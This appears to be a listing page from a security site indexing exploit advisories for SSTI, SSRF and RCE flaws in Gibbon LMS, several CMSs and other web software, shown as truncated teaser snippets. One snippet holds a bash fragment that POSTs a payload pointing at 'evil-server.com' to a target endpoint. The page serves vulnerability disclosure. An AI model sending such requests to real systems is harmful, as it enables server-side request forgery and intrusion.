Gibbon 26.0.00 Server-Side Template Injection / Remote Code Execution – Torchsec
April 2nd, 2024 | ๐
Text to Voice # Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version# Date: 21.01.2024# Exploit Author:
April 2nd, 2024 | ๐
Text to Voice # Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version# Date: 21.01.2024# Exploit Author:
March 30th, 2024 | ๐
iSpeech.org Exploit Title: FoF Pretty Mail 1.1.2 Extension for Flarum Server-SideTemplate Injection (SSTI)Date: 03/28/2024Exploit Author: Chokri HammediVendor Homepage: https://flarum.org/Software Link:
March 9th, 2024 | ๐
iSpeech.org # Exploit Title: Ladder v0.0.21 Server-side request forgery (SSRF)# Date: 2024-01-20# Exploit Author: @_chebuya# Software Link: https://github.com/everywall/ladder# Version: v0.0.1
February 22nd, 2024 | ๐
Powered by iSpeech # Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI# Date: 2024-21-02# Exploit Author: tmrswrr# Vendor Homepage:
January 15th, 2024 | ๐
TTS #!/bin/bash # Set target URL and payloadtarget_url="http://example.com/application/pay/controller/Api.php"payload="url=http://evil-server.com/exploit" # Send the malicious requestresponse=$(curl -s -X POST -d "$payload" "$target_url") #
December 6th, 2023 | ๐
iSpeech.org Winter CMS 1.2.2 Server-Side Template Injection Posted Dec 6, 2023 Authored by tmrswrr Winter CMS version 1.2.2 suffers from
October 27th, 2023 | ๐
iSpeech ----------------------------------------------------------------------------Sugar
October 10th, 2023 | ๐
TTS Demo Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8 Bugs: Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link:
August 11th, 2023 | ๐
iSpeech # Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)# Exploit Author: Iyaad Luqman K (init_6)# Application: Request-Baskets v1.2.1#
August 10th, 2023 | ๐
Powered by iSpeech # Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)# Exploit Author: Daniel Barros (@cupc4k3d)
July 12th, 2023 | ๐
iSpeech.org Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration Vendor: AtemeProduct web page: https://www.ateme.comAffected version: 3.9.12.43.9.11.03.9.9.23.9.8.0 Summary: TITAN File
July 5th, 2023 | ๐
iSpeech.org #Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection#Application: PodcastGenerator#Version: v3.2.9#Bugs: Blind SSRF via XML Injection#Technology: PHP#Vendor URL:
May 30th, 2023 | ๐
Text to Speech Voices For longer running processes, Pydio Cells allows for the creation ofjobs, which are run in the
May 30th, 2023 | ๐
https://www.ispeech.org/text.to.speech Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)Exploit Author: PARAG BAGULCVE: CVE-2023-30145 ## DescriptionCamaleon CMS v2.7.0 was
Gloss